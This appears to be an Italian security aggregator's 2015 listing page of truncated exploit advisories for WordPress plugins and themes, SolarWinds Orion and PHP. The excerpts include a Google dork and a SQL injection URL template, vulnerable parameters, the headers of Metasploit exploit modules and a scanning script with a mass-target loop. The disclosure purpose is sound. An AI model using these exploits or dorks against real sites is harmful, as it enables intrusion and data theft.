WordPress WP All 3.2.3 Shell Upload

5 marzo 2015 - Fonte: http://www.mondounix.com
------------------------------------------------------------------------------
WordPress WP All Import Plugin RCE
------------------------------------------------------------------------------
 
[-] Vulnerability Author:
 
James Golovich ( @Pritect )
 
[-] Exploit Author
 
Evex ( @Evex_1337 )
 
[-] Plugin Link:
 
https://wordpress.org/plugins/wp-all-import/
 
[-] Affected Version:
 
Version <= 3.2.3
 
 
[-] Vulnerability Description:
 
 
    Retrieve any file on the system that ends in .txt
    Retrieve any file on the system that ends in .html
    Retrieve any value from the postmeta table
    Upload arbitrary files to system
 
 
Reference:
http://www.pritect.net/blog/wp-all-import-3-2-3-pro-4-0-3-vulnerability-breakdown
 
 
[-]...

Leggi il seguito »

WordPress Photocrati Theme 4.x.x SQL Injection

5 marzo 2015 - Fonte: http://www.mondounix.com
# Exploit Title: [ wordpress theme photocrati 4.X.X SQL INJECTION ]
# Google Dork: [ Designed by Photocrati ] also [powered by Photocrati]
# Date: [23 / 09 / 2011 ]
# Exploit Author: [ ayastar ]
# Email : dmx-ayastar@hotmail.fr
# Software Link: [ http://www.photocrati.com ]
# Version: [4.X.X]
# Tested on: [ windows 7 ]
 
 
--------
details |
=======================================================
Software : photocrati
version : 4.X.X
Risk : High
remote : yes
 
attacker can do a remote injection in site URL to get some sensitive information .
=======================================================
Exploit code :
http://sitewordpress/wp-content/themes/[photocrati-Path-theme]/ecomm-sizes.php?prod_id=[SQL]
 
greetz...

Leggi il seguito »

WordPress Media Cleaner 2.2.6 Cross Site Scripting

5 marzo 2015 - Fonte: http://www.mondounix.com
# Exploit Title: Wordpress Media Cleaner - XSS
# Author: İsmail SAYGILI
# Web Site: www.ismailsaygili.com.tr
# E-Mail: iletisim@ismailsaygili.com.tr
# Date: 2015-02-26
# Plugin Download: https://downloads.wordpress.org/plugin/wp-media-cleaner.2.2.6.zip
# Version: 2.2.6
 
 
# Vulnerable File(s):
                [+] wp-media-cleaner.php
 
# Vulnerable Code(s):
        [+] 647. Line
          $view = $_GET['view'] : "issues"; 
        [+] 648. Line  
          $paged = $_GET['paged'] : 1;
        [+] 653. Line
          $s = isset ( $_GET[ 's' ] ) ? $_GET[ 's' ] : null;
 
# Request Method(s):
                [+] GET
 
# Vulnerable Parameter(s):
                [+] view, paged, s
 
 
 
#...

Leggi il seguito »

WordPress Holding Pattern Theme Arbitrary File Upload

5 marzo 2015 - Fonte: http://www.mondounix.com
##
# This module requires Metasploit: http://www.metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
require 'socket'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::Exploit::FileDropper
  include Msf::HTTP::Wordpress
 
  def initialize(info = {})
    super(update_info(
      info,
      'Name'            => 'WordPress Holding Pattern Theme Arbitrary File Upload',
      'Description'     => %q{
          This module exploits a file upload vulnerability in all versions of the
          Holding Pattern theme found in the upload_file.php script which contains
          no session or file validation. It...

Leggi il seguito »

WordPress Admin Shell Upload

5 marzo 2015 - Fonte: http://www.mondounix.com
##
# This module requires Metasploit: http://www.metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
require 'rex/zip'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::Exploit::FileDropper
  include Msf::HTTP::Wordpress
 
  def initialize(info = {})
    super(update_info(
      info,
      'Name'            => 'WordPress Admin Shell Upload',
      'Description'     => %q{
          This module will generate a plugin, pack the payload into it
          and upload it to a server running WordPress providing valid
          admin credentials are used.
        },
      'License'         => MSF_LICENSE,
...

Leggi il seguito »

Cross Site Tracer Script

5 marzo 2015 - Fonte: http://www.mondounix.com
#!/usr/bin/python
# Cross-Site Tracer by 1N3 v20150224
# https://crowdshield.com
#
# ABOUT: A quick and easy script to check remote web servers for Cross-Site Tracing. For more robust mass scanning, create a list of domains or IP addresses to iterate through by running 'for a in `cat targets.txt`; do ./xsstracer.py $a 80; done;'
#
# USAGE: xsstracer.py <IP/host> <port>
#
 
import socket
import time
import sys, getopt
 
class bcolors:
    HEADER = '\033[95m'
    OKBLUE = '\033[94m'
    OKGREEN = '\033[92m'
    WARNING = '\033[93m'
    FAIL = '\033[91m'
    ENDC = '\033[0m'
    BOLD = '\033[1m'
    UNDERLINE = '\033[4m'
 
def main(argv):
  argc = len(argv)
 
  if argc <= 2:
    print bcolors.OKBLUE...

Leggi il seguito »

Solarwinds Orion Service SQL Injection

4 marzo 2015 - Fonte: http://www.mondounix.com
I found a couple SQL injection vulnerabilities in the core Orion service used in most of the Solarwinds products (SAM, IPAM, NPM, NCM, etc…). This service provides a consistent configuration and authentication layer across the products.
 
To be exact, the vulnerable applications and versions are:
 
Network Performance Monitor -- < 11.5
NetFlow Traffic Analyzer -- < 4.1
Network Configuration Manager -- < 7.3.2
IP Address Manager -- < 4.3
User Device Tracker -- < 3.2
VoIP & Network Quality Manager -- < 4.2
Server & Application Monitor -- < 6.2
Web Performance Monitor -- < 2.2
 
At first glance, the injections are only available to admins, as the requests used are on the Manage Accounts...

Leggi il seguito »

WordPress ADPlugg 1.1.33 Cross Site Scripting

26 febbraio 2015 - Fonte: http://www.mondounix.com
=====================================================
Stored XSS Vulnerability in ADPlugg  Wordpress Plugin 
=====================================================
 
. contents:: Table Of Content
 
Overview
========
 
* Title :Stored XSS Vulnerability in ADPlugg Wordpress Plugin 
* Author: Kaustubh G. Padwad
* Plugin Homepage: https://wordpress.org/plugins/adplugg/
* Severity: Medium
* Version Affected: 1.1.33 and mostly prior to it
* Version Tested : 1.1.33
* version patched: 1.1.34
 
Description 
===========
 
Vulnerable Parameter  
--------------------
 
*  Access Code
 
About Vulnerability
-------------------
This plugin is vulnerable to a Stored cross site scripting vulnerability,This...

Leggi il seguito »

WordPress WooCommerce 2.2.10 Cross Site Scripting

26 febbraio 2015 - Fonte: http://www.mondounix.com
====================================================
Product: WooCommerce WordPress plugin
Vendor: WooThemes
Tested Version: 2.2.10
Vulnerability Type: Cross-Site Scripting [CWE-79]
Risk Level: Medium
CVSSv2 Base Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
Solution Status: Solved in version 2.2.11
Discovered and Provided: Eric Flokstra - ITsec Security Services
====================================================
[-] About the Vendor:
 
WooCommerce is a popular open source WordPress e-commerce plugin with 
around 6.2 million downloads.It is built by WooThemes and designed for 
small to large-sized online merchants.
 
[-] Advisory Details:
 
The WooCommerce plugin gives users the ability to see their stores 
performance...

Leggi il seguito »

PHP DateTime Use-After-Free

25 febbraio 2015 - Fonte: http://www.mondounix.com
#Use After Free Vulnerability in unserialize() with DateTime* [CVE-2015-0273]
 
Taoguang Chen <[@chtg](http://github.com/chtg)> - Write Date:
2015.1.29 - Release Date: 2015.2.20
 
> A use-after-free vulnerability was discovered in unserialize() with DateTime/DateTimeZone/DateInterval/DatePeriod objects's __wakeup() magic method that can be abused for leaking arbitrary memory blocks or execute arbitrary code remotely.
 
Affected Versions
------------
Affected is PHP 5.6 < 5.6.6
Affected is PHP 5.5 < 5.5.22
Affected is PHP 5.4 < 5.4.38
 
Credits
------------
This vulnerability was disclosed by Taoguang Chen.
 
Description
------------
 
```
static int php_date_initialize_from_hash(php_date_obj...

Leggi il seguito »